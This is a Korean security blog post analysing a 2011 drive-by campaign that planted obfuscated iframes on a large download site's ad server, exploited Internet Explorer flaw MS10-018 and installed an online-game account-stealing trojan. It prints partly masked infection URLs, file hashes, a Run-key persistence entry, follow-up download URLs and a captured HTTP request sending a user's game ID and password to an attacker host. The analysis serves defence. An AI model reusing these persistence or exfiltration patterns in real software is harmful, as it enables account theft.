악성코드 유포 : 국내 최대 공개 자료실을 통한 이용한 온라인 게임 계정 탈취 (2011.1.22)

주말을 이용하여 중국 사이버 범죄 조직의 악성코드 유포 행위가 빈번하게 발생하고 있는 가운데, 저번주부터 국내 최대 규모의 공개 자료실에 악성 스크립트를 추가하여 접속자를 감염시키는 행위가 확인되고 있습니다.

[악성코드 유포 경로]

h**p://adv.****.com/js.kti/sim****/sim_main@rectangle
 ㄴ h**p://173.***.192.***/img.js
   ㄴ h**p://173.***.192.***/zfotp.htm
     ㄴ h**p://upload.mato***.com/uploads/23686589.Jpg
   ㄴ h**p://173.***.192.***/zgrtop.htm
     ㄴ h**p://upload.mato***.com/uploads/23686589.Jpg
   ㄴ h**p://173.***.192.***/out.html
     ㄴ h**p://s5.cnzz.com/stat.php?id=2812624&web_id=2812624&show=pic

해당 악성코드는 해당 공개 자료실의 광고 서버쪽에 악성 iframe을 추가하는 방식으로 img.js 파일을 추가하여 해당 자료실 접속자 중 Internet Explorer 보안 취약점이 존재하는 시스템에 대하여 자동으로 감염이 이루어지도록 구성되어 있습니다.

img.js

현재 img.js 파일에 대하여 avast! 보안 제품에서는 HTML:IFrame-GN 진단명으로 진단되고 있으며, 해당 난독화된 악성 스크립트에는 총 3개의 iframe이 추가된 것으로 확인이 됩니다.

• Microsoft Internet Explorer 긴급 보안 업데이트 : MS10-018 (2010.3.31)

그 중에서 zfotp.htm(avast! : JS:CVE-2010-0806-BH), zgrtop.htm(avast! : JS:Downloader-AJU) 파일에 대하여 진단이 이루어지고 있는 것을 확인할 수 있으며, MS10-018 보안 패치가 이루어지지 않은 PC는 보안 제품에서 실시간 감시를 통해 진단되지 않는다면 자동으로 감염 될 수 있습니다.

23686589.jpg

최종적으로 사용자 PC에 다운로드되는 23686589.jpg (SHA1 : 3a99ece93585c9024c0d85d8f1eef74c9b4e86fd) 파일은 PE 파일 구조로 Ikarus 보안 제품에서 Trojan-GameThief.Win32.Magania (VirusTotal : 12/43) 진단명으로 진단되는 온라인 게임 계정 탈취 목적의 악성 파일임을 확인할 수 있습니다.

[생성 파일 등록 및 진단 정보]

C:\Documents and Settings\(사용자 계정)\Microsoft\Sqlwriters.dll (SHA1 : 3a9ba57c85145b3abb9d43b73ba9e3ca2d2e3a20)
 - AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 15/43)

[생성 레지스트리 등록 정보]

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 - Sqlwriters = rundll32.exe "C:\Documents and Settings\(사용자 계정)\Microsoft\Sqlwriters.dll", Launch

초기 감염이 될 경우 [C:\Documents and Settings\(사용자 계정)\Microsoft] 폴더를 생성하여 Sqlwriters.dll 파일을 Windows 시작시 자동 실행되도록 레지스트리 등록하도록 구성되어 있습니다.

자동 실행되는 방식은 정상적인 마이크로소프트(Microsoft) rundll32.exe(C:\WINDOWS\system32\rundll32.exe) 프로세스가 동작할 때 자신을 삽입하여 동작을 하는 방식입니다.

참고로 rundll32.exe 프로세스는 정상적인 PC 환경에서는 시스템 시작시 동작 후 자동으로 종료를 하지만, 해당 악성코드에 감염된 경우에는 메모리에 상주하여 UDP 프로토콜을 열어둔 상태로 대기를 합니다.

또한 시스템 시작시 특정 서버에 접속하여 다음과 같은 파일을 추가적으로 다운로드 및 파일 생성을 하는 것을 확인할 수 있습니다.

h**p://96.**.169.**:61688/img/img.txt
 ㄴ h**p://72.**.141.***:45632/img/valiting.exe

C:\WINDOWS\system32\LO0Cvel.exe (SHA1 : 8bfb683ba92ebac9b3c8ea732d059b14626b7663)
 - AntiVir : TR/Crypt.ASPM.Gen (VirusTotal : 9/43)

C:\WINDOWS\system32\LO0Cvel10.dll (SHA1 : 04b1ec6517f002c33c48003046d515ba40de9c3f)
 - AntiVir : TR/Crypt.ASPM.Gen (VirusTotal : 12/43)

C:\WINDOWS\system32\LO0Cvel20.dll (SHA1 : 2f23352da0f818fb21df5f837b0f2c7bd1006987)
 - AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 12/43)

C:\Documents and Settings\(사용자 계정)\Microsoft\Sqlwriters.log

이 과정에서 일부 PC 환경에서는 다운로드된 valiting.exe 파일이 동작 후 오류 메시지를 유발할 수 있으며 이를 통해 감염 여부를 간접적으로 의심할 수 있습니다.

시스템 폴더에 생성된 파일 중 LO0Cvel.exe / LO0Cvel10.dll 파일은 숨김(H), 시스템(S) 속성으로 인하여 폴더 옵션을 조정하지 않을 경우 윈도우 탐색기에서 확인이 불가능하므로 참고하시기 바랍니다.

LO0Cvel20.dll

해당 악성코드의 기본적인 동작 방식은 사용자가 Internet Explorer를 실행하면 iexplore.exe 프로세스에 [C:\WINDOWS\system32\LO0Cvel20.dll] 파일을 삽입하여 국내 특정 온라인 게임 계정 정보를 유출하도록 제작되어 있습니다.

[한게임(HanGame) 로그인시 정보 유출 정보]

GET /udaogla/count.asp?u=(사용자 아이디)&p=(사용자 비밀번호)&pc= HTTP/1.1
User-Agent: Forthgoer
Host: jacks56896563.jackskys.com:1616
Cache-Control: no-cache

테스트를 통해 확인해보면 사용자가 온라인 게임 로그인을 시도할 경우 미국(USA)에 위치한 특정 서버로 계정 정보를 유출하는 것을 확인할 수 있습니다.

그러므로 기본적으로 인터넷 사용자는 Windows 보안 패치 및 사용자 PC에서 사용하는 각종 응용 프로그램의 최신 버전 사용을 권장하며, 보안 제품의 실시간 감시 기능을 반드시 ON 하시고 이용하시기 바랍니다.

특히 감염이 의심될 경우에는 사이트 로그인을 삼가하시고 보안 제품을 통한 치료 후 가입된 사이트의 비밀번호를 변경하시는 것이 좋습니다.